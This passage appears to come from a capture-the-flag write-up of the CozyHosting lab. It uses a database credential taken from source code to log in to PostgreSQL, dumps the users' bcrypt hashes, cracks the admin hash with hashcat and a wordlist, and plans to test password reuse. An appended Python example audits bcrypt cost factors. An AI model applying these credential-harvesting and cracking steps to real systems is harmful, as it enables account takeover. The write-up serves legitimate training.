PostgreSQL


The presence of a PostgreSQL instance is confirmed from multiple sources, including process and network enumeration. PEAS was also able to pick it up.

While enumerating the source code of the web application, one of the source files contained the configuration, which includes a DB credential: postgres:Vg&nvzAQ7XxR

app@cozyhosting:/app$ psql 'postgresql://postgres:Vg&nvzAQ7XxR@localhost:5432/cozyhosting'

Authenticated

DBs


\list
                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
(4 rows)
 
\c cozyhosting
You are now connected to database "cozyhosting" as user "postgres".

I will check the cozyhosting DB

Tables


\d
              List of relations
 Schema |     Name     |   Type   |  Owner   
--------+--------------+----------+----------
 public | hosts        | table    | postgres
 public | hosts_id_seq | sequence | postgres
 public | users        | table    | postgres
(3 rows)

There are 3 relations within the cozyhosting DB: the hosts and users tables, and the hosts_id_seq sequence

cozyhosting.hosts


SELECT * FROM "public"."hosts";
 id | username  |      hostname      
----+-----------+--------------------
  1 | kanderson | suspicious mcnulty
  5 | kanderson | boring mahavira
  6 | kanderson | stoic varahamihira
  7 | kanderson | awesome lalande
(4 rows)

Arbitrary data

cozyhosting.hosts_id_seq


SELECT * FROM "public"."hosts_id_seq";
 last_value | log_cnt | is_called 
------------+---------+-----------
          7 |      26 | t
(1 row)

cozyhosting.users


SELECT * FROM "public"."users";
   name    |                           password                           | role  
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)

The cozyhosting.users table contains user credentials, stored as bcrypt hashes ($2a$, cost 10)

Password Cracking


┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ hashcat -a 0 -m 3200 hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
minimum password length supported by kernel: 0
maximum password length supported by kernel: 72
 
hashes: 2 digests; 2 unique digests, 2 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => q
 
session..........: hashcat
status...........: Quit
hash.mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
hash.target......: hashes
time.started.....: Sun Sep 10 00:14:55 2023 (56 secs)
time.estimated...: Mon Sep 11 12:51:29 2023 (1 day, 12 hours)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:      109 H/s (4.73ms) @ Accel:6 Loops:16 Thr:1 Vec:1
recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new), 1/2 (50.00%) Salts
progress.........: 6480/28688770 (0.02%)
rejected.........: 0/6480 (0.00%)
restore.point....: 3240/14344385 (0.02%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:336-352
candidate.engine.: Device Generator
candidates.#1....: hotrod -> blake
hardware.mon.#1..: Util: 82%
 
started: Sun Sep 10 00:14:52 2023
stopped: Sun Sep 10 00:15:52 2023

Hashcat cracked one of the hashes (the admin entry): manchesterunited. I will test password reuse on the josh user.
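
Added example, not part of the original write-up: a small audit of the bcrypt values from the users table that parses the hash format, flags cost factors below a policy minimum, and reproduces hashcat's time estimate from the figures shown above. The function names and the minimum cost of 12 are assumptions made for this illustration.

```python
import re
from dataclasses import dataclass

# bcrypt modular crypt format: $<version>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

@dataclass
class BcryptHash:
    version: str
    cost: int      # work factor: 2**cost key-expansion rounds
    salt: str
    digest: str

def parse_bcrypt(value):
    """Split a stored bcrypt string into its fields, rejecting malformed input."""
    m = BCRYPT_RE.match(value.strip())
    if not m:
        raise ValueError("not a bcrypt hash: %r" % value)
    cost = int(m.group(2))
    if not 4 <= cost <= 31:          # range accepted by bcrypt implementations
        raise ValueError("cost out of range: %d" % cost)
    return BcryptHash(m.group(1), cost, m.group(3), m.group(4))

def audit(rows, min_cost=12):
    """Return (name, cost) for every row below min_cost (assumed policy value)."""
    return [(name, parse_bcrypt(h).cost) for name, h in rows
            if parse_bcrypt(h).cost < min_cost]

def wordlist_seconds(words, salts, rate_hs, measured_cost, target_cost):
    """Worst-case seconds to test every word against every salt.
    Each +1 in cost doubles the work, so the measured rate halves."""
    rate = rate_hs / 2 ** (target_cost - measured_cost)
    return words * salts / rate

# Rows as they appear in the users table above.
USERS = [
    ("kanderson", "$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim"),
    ("admin", "$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm"),
]

if __name__ == "__main__":
    print("below policy:", audit(USERS))
    # Figures from the hashcat run: 14344385 words, 109 H/s at cost 10,
    # one salt left once the admin hash was recovered.
    for cost in (10, 12, 14):
        hours = wordlist_seconds(14344385, 1, 109, 10, cost) / 3600
        print("cost %d: %.1f hours for the full wordlist" % (cost, hours))
```

At cost 10 the result is about 36.6 hours, matching hashcat's "1 day, 12 hours" estimate for the remaining hash. Raising the cost only multiplies that figure, so a password near the top of a common wordlist, like the one recovered here within 56 seconds, still has to be rejected when it is set.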